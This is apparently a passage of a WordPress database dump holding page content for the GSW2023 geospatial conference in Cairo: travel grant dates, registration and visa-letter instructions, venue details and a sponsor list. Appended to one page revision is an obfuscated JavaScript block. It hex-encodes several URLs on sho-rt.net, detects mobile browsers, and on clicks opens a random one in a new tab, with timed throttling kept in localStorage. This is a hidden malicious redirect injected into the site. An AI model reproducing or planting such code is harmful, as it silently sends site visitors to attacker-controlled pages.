style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:06:32','2023-06-09 22:06:32','',3066,'https://gsw2023.com/?p=4667',0,'revision','',0),
(4668,1,'2023-06-09 22:07:34','2023-06-09 22:07:34','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" 